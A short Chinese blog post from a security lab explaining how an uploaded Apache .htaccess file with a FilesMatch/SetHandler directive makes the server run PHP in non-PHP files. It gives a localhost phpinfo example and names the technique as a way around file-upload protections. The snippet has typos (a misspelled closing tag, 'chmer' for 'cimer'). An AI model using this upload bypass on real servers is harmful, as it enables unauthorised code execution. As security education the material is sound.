Frieza

MS08067安全实验室

  博客园  :: 首页  :: 新随笔  :: 联系 ::  :: 管理

taccess文件(或者"分布式配置文件"), 全称是Hypertext Access(超文本入口), 是Apache服务器中的一个配置文件, 负责相关目录下的网页配置, 了针对目录改变配置的方法, 即在一个特定的文档目录中放置一个包含一个或多个指令的文件, 作用于此目录及其所有子目录, 通过.htaccess文件可以实现网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

原理

<FilesMatch "cimer">
Sethandler application/x-httpd-php
</Eilesmatch >

通过.htaccess文件, 调用php的解析器解析一个包含'chmer'这个字符串的任意文件

案例

  1. 创建.htaccess文件

     <FilesMatch "cimer">
     Sethandler application/x-httpd-php
     </Eilesmatch >
    
  2. 创建cimer.html文件

     <?php
     phpinfo();
     ?>
    
  3. 直接访问 http://127.0.0.1/cimer.html ,就会出现phpinfo的界面

利用

  1. 通过上传 .htaccess 文件, 直接修改解析规则
  2. 绕过文件上传漏洞防护
posted on 2021-05-26 12:04  Frieza_021  阅读(270)  评论(0编辑  收藏  举报